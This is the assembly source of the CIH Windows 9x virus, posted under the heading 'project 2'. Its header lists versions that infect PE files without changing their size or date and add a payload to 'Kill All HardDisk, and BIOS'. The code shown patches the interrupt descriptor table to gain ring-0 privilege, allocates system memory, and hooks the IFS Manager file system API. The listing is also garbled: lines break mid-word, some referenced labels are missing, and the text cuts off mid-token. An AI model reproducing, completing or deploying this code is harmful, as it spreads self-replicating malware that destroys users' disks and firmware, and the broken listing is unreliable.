project 2

1. ; ********************************************************************
2. ********
3. ; * The Virus Program Information
4. *
5. ; ********************************************************************
6. ********
7. ; *
8. *
9. ; * Designer : CIH Source : TTIT of TATUNG in Tai
10. wan *
11. ; * Create Date : 04/26/1998 Now Version : 1.4
12. *
13. ; * Modification Time : 05/31/1998
14. *
15. ; *
16. *
17. ; * Turbo Assembler Version 4.0 : tasm /m cih
18. *
19. ; * Turbo Link Version 3.01 : tlink /3 /t cih, cih.exe
20. *
21. ; *
22. *
23. ; *===================================================================
24. =======*
25. ; * Modification History
26. *
27. ; *===================================================================
28. =======*
29. ; * v1.0 1. Create the Virus Program.
30. *
31. ; * 2. The Virus Modifies IDT to Get Ring0 Privilege.
32. *
33. ; * 04/26/1998 3. Virus Code doesn't Reload into System.
34. *
35. ; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File S
36. ystem. *
37. ; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApi
38. Hook. *
39. ; * 6. When System Opens Existing PE File, the File will b
40. e *
41. ; * Infected, and the File doesn't be Reinfected.
42. *
43. ; * 7. It is also Infected, even the File is Read-Only.
44. *
45. ; * 8. When the File is Infected, the Modification Date an
46. d Time *
47. ; * of the File also don't be Changed.
48. *
49. ; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not
50. Call *
51. ; * Previous FileSystemApiHook, it will Call the Functi
52. on *
53. ; * that the IFS Manager Would Normally Call to Impleme
54. nt *
55. ; * this Particular I/O Request.
56. *
57. ; * 10. The Virus Size is only 656 Bytes.
58. *
59. ; *===================================================================
60. =======*
61. ; * v1.1 1. Especially, the File that be Infected will not Incr
62. ease *
63. ; * it's Size... ^__^
64. *
65. ; * 05/15/1998 2. Hook and Modify Structured Exception Handing.
66. *
67. ; * When Exception Error Occurs, Our OS System should b
68. e in *
69. ; * Windows NT. So My Cute Virus will not Continue to R
70. un, *
71. ; * it will Jmup to Original Application to Run.
72. *
73. ; * 3. Use Better Algorithm, Reduce Virus Code Size.
74. *
75. ; * 4. The Virus "Basic" Size is only 796 Bytes.
76. *
77. ; *===================================================================
78. =======*
79. ; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer...
80. *
81. ; * 2. Modify the Bug of v1.1
82. *
83. ; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes.
84. *
85. ; *===================================================================
86. =======*
87. ; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Er
88. ror. *
89. ; * So When Open WinZip Self-Extractor ==> Don't Infect
90. it. *
91. ; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes.
92. *
93. ; *===================================================================
94. =======*
95. ; * v1.4 1. Full Modify the Bug : WinZip Self-Extractor Occurs
96. Error. *
97. ; * 2. Change the Date of Killing Computers.
98. *
99. ; * 05/31/1998 3. Modify Virus Version Copyright.
100. *
101. ; * 4. The Virus "Basic" Size is 1019 Bytes.
102. *
103. ; ********************************************************************
104. ********
105.  
106.  
107. .586P
108.  
109.  
110.  
111. ; ********************************************************************
112. ********
113. ; * Original PE Executable File(Don't Modify this Section)
114. *
115. ; ********************************************************************
116. ********
117.  
118.  
119. OriginalAppEXE SEGMENT
120.  
121.  
122.  
123. FileHeader:
124.  
125. db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h
126.  
127. db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h
128.  
129. db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
130.  
131. db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
132.  
133. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
134.  
135. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
136.  
137. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
138.  
139. db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h
140.  
141. db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh
142.  
143. db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h
144.  
145. db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h
146.  
147. db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh
148.  
149. db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh
150.  
151. db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h
152.  
153. db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah
154.  
155. db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
156.  
157. db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h
158.  
159. db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h
160.  
161. db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h
162.  
163. db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h
164.  
165. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
166.  
167. db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h
168.  
169. db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h
170.  
171. db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h
172.  
173. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
174.  
175. db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
176.  
177. db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h
178.  
179. db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h
180.  
181. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
182.  
183. db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h
184.  
185. db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h
186.  
187. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
188.  
189. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
190.  
191. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
192.  
193. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
194.  
195. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
196.  
197. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
198.  
199. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
200.  
201. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
202.  
203. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
204.  
205. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
206.  
207. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
208.  
209. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
210.  
211. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
212.  
213. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
214.  
215. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
216.  
217. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
218.  
219. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
220.  
221. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
222.  
223. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
224.  
225. db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
226.  
227. db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h
228.  
229. dd 00000000h, VirusSize
230.  
231.  
232.  
233. lea ecx, StopToRunVirusCode-@0[ebx]
234.  
235. push ecx
236.  
237.  
238.  
239. push eax
240.  
241.  
242.  
243. ; *************************************
244.  
245. ; * Let's Modify *
246.  
247. ; * IDT(Interrupt Descriptor Table) *
248.  
249. ; * to Get Ring0 Privilege... *
250.  
251. ; *************************************
252.  
253.  
254.  
255. push eax ;
256.  
257. sidt [esp-02h] ; Get IDT Base Address
258.  
259. pop ebx ;
260.  
261.  
262.  
263. add ebx, HookExceptionNumber*08h+04h ; ZF
264. = 0
265.  
266.  
267. cli
268.  
269.  
270.  
271. mov ebp, [ebx] ; Get Exception Base
272.  
273. mov bp, [ebx-04h] ; Entry Point
274.  
275.  
276.  
277. lea esi, MyExceptionHook-@1[ecx]
278.  
279.  
280.  
281. push esi
282.  
283.  
284.  
285. mov [ebx-04h], si ;
286.  
287. shr esi, 16 ; Modify Excep
288. tion
289. mov [ebx+02h], si ; Entry Point
290. Address
291.  
292.  
293. pop esi
294.  
295.  
296.  
297. ; *************************************
298.  
299. ; * Generate Exception to Get Ring0 *
300.  
301. ; *************************************
302.  
303.  
304.  
305. int HookExceptionNumber ; GenerateExce
306. ption
307. ReturnAddressOfEndException = $
308.  
309.  
310.  
311. ; *************************************
312.  
313. ; * Merge All Virus Code Section *
314.  
315. ; *************************************
316.  
317.  
318.  
319. ; *************************************
320.  
321. ; * Generate Exception Again *
322.  
323. ; *************************************
324.  
325.  
326.  
327. int HookExceptionNumber ; GenerateExce
328. ption Aga
329.  
330.  
331.  
332.  
333. ; *************************************
334.  
335. ; * Let's Restore *
336.  
337. ; * Structured Exception Handing *
338.  
339. ; *************************************
340.  
341.  
342.  
343. ReadyRestoreSE:
344.  
345. sti
346.  
347.  
348.  
349. xor ebx, ebx
350.  
351.  
352.  
353. jmp RestoreSE
354.  
355.  
356.  
357. ; *************************************
358.  
359. ; * When Exception Error Occurs, *
360.  
361. ; * Our OS System should be in NT. *
362.  
363. ; * So My Cute Virus will not *
364.  
365. ; * Continue to Run, it Jmups to *
366.  
367. ; * Original Application to Run. *
368.  
369. ; *************************************
370.  
371.  
372.  
373. StopToRunVirusCode:
374.  
375. @1 = StopToRunVirusCode
376.  
377.  
378.  
379. xor ebx, ebx
380.  
381. mov eax, fs:[ebx]
382.  
383. mov esp, [eax]
384.  
385.  
386.  
387. RestoreSE:
388.  
389. pop dword ptr fs:[ebx]
390.  
391. pop eax
392.  
393.  
394.  
395. ; *************************************
396.  
397. ; * Return Original App to Execute *
398.  
399. ; *************************************
400.  
401.  
402.  
403. pop ebp
404.  
405.  
406.  
407. push 00401000h ; Push Original
408.  
409. OriginalAddressOfEntryPoint = $-4 ; App Entry Point to S
410. tack
411.  
412.  
413. ret ; Return to Original App Entry Point
414.  
415.  
416.  
417. ; *********************************************************
418.  
419. ; * Ring0 Virus Game Initial Program *
420.  
421. ; *********************************************************
422.  
423.  
424.  
425. MyExceptionHook:
426.  
427. @2 = MyExceptionHook
428.  
429.  
430.  
431. jz InstallMyFileSystemApiHook
432.  
433.  
434.  
435. ; *************************************
436.  
437. ; * Do My Virus Exist in System !? *
438.  
439. ; *************************************
440.  
441.  
442.  
443. mov ecx, dr0
444.  
445. jecxz AllocateSystemMemoryPage
446.  
447.  
448.  
449. add dword ptr [esp], ReadyRestoreSE-Return
450. AddressOf
451. dException
452.  
453.  
454.  
455. ; *************************************
456.  
457. ; * Return to Ring3 Initial Program *
458.  
459. ; *************************************
460.  
461.  
462.  
463. ExitRing0Init:
464.  
465. mov [ebx-04h], bp ;
466.  
467. shr ebp, 16 ; Restore Exception
468.  
469. mov [ebx+02h], bp ;
470.  
471.  
472.  
473. iretd
474.  
475.  
476.  
477. ; *************************************
478.  
479. ; * Allocate SystemMemory Page to Use *
480.  
481. ; *************************************
482.  
483.  
484.  
485. AllocateSystemMemoryPage:
486.  
487.  
488.  
489. mov dr0, ebx ; Set the Mark of My V
490. irus Exis
491. in System
492.  
493.  
494.  
495. push 00000000fh ;
496.  
497. push ecx ;
498.  
499. push 0ffffffffh ;
500.  
501. push ecx ;
502.  
503. push ecx ;
504.  
505. push ecx ;
506.  
507. push 000000001h ;
508.  
509. push 000000002h ;
510.  
511. int 20h ; VMMCALL _PageAllocat
512. e
513. _PageAllocate = $ ;
514.  
515. dd 00010053h ; Use EAX, ECX, EDX, a
516. nd flags
517. add esp, 08h*04h
518.  
519.  
520.  
521. xchg edi, eax ; EDI = SystemMemory S
522. tart Addr
523. s
524.  
525.  
526.  
527. lea eax, MyVirusStart-@2[esi]
528.  
529.  
530.  
531. iretd ; Return to Ring3 Initial Program
532.  
533.  
534.  
535. ; *************************************
536.  
537. ; * Install My File System Api Hook *
538.  
539. ; *************************************
540.  
541.  
542.  
543. InstallMyFileSystemApiHook:
544.  
545.  
546.  
547. lea eax, FileSystemApiHook-@6[edi]
548.  
549.  
550.  
551. push eax ;
552.  
553. int 20h ; VXDCALL IFSMgr_InstallFileSyste
554. mApiHook
555. IFSMgr_InstallFileSystemApiHook = $ ;
556.  
557. dd 00400067h ; Use EAX, ECX, EDX, a
558. nd flags
559.  
560.  
561. mov dr0, eax ; Save OldFileSystemAp
562. iHook Add
563. ss
564.  
565.  
566.  
567. pop eax ; EAX = FileSystemApiHook Addr
568. ess
569.  
570.  
571. ; Save Old IFSMgr_InstallFileSystemApiHook Ent
572. ry Point
573. mov ecx, IFSMgr_InstallFileSystemApiHook-@
574. 2[esi]
575. mov edx, [ecx]
576.  
577. mov OldInstallFileSystemApiHook-@3[eax], e
578. dx
579.  
580.  
581. ; Modify IFSMgr_InstallFileSystemApiHook Entry
582. Point
583. lea eax, InstallFileSystemApiHook-@3[eax]
584.  
585. mov [ecx], eax
586.  
587.  
588.  
589. cli
590.  
591.  
592.  
593. jmp ExitRing0Init
594.  
595.  
596.  
597. ; *********************************************************
598.  
599. ; * Code Size of Merge Virus Code Section *
600.  
601. ; *********************************************************
602.  
603.  
604.  
605. CodeSizeOfMergeVirusCodeSection = offset $
606.  
607.  
608.  
609. ; *********************************************************
610.  
611. ; * IFSMgr_InstallFileSystemApiHook *
612.  
613. ; *********************************************************
614.  
615.  
616.  
617. InstallFileSystemApiHook:
618.  
619. push ebx
620.  
621.  
622.  
623. call @4 ;
624.  
625. @4: ;
626.  
627. pop ebx ; mov ebx, offset FileSystemAp
628. iHook
629. add ebx, FileSystemApiHook-@4 ;
630.  
631.  
632.  
633. push ebx
634.  
635. int 20h ; VXDCALL IFSMgr_RemoveFileSystem
636. ApiHook
637. IFSMgr_RemoveFileSystemApiHook = $
638.  
639. dd 00400068h ; Use EAX, ECX, EDX, a
640. nd flags
641. pop eax
642.  
643.  
644.  
645. ; Call Original IFSMgr_InstallFileSystemApiHoo
646. k
647. ; to Link Client FileSystemApiHook
648.  
649. push dword ptr [esp+8]
650.  
651. call OldInstallFileSystemApiHook-@3[ebx]
652.  
653. pop ecx
654.  
655.  
656.  
657. push eax
658.  
659.  
660.  
661. ; Call Original IFSMgr_InstallFileSystemApiHoo
662. k
663. ; to Link My FileSystemApiHook
664.  
665. push ebx
666.  
667. call OldInstallFileSystemApiHook-@3[ebx]
668.  
669. pop ecx
670.  
671.  
672.  
673. mov dr0, eax ; Adjust OldFileSystem
674. ApiHook A
675. ress
676.  
677.  
678.  
679. pop eax
680.  
681.  
682.  
683. pop ebx
684.  
685.  
686.  
687. ret
688.  
689.  
690.  
691. ; *********************************************************
692.  
693. ; * Static Data *
694.  
695. ; *********************************************************
696.  
697.  
698.  
699. OldInstallFileSystemApiHook dd ?
700.  
701. &nb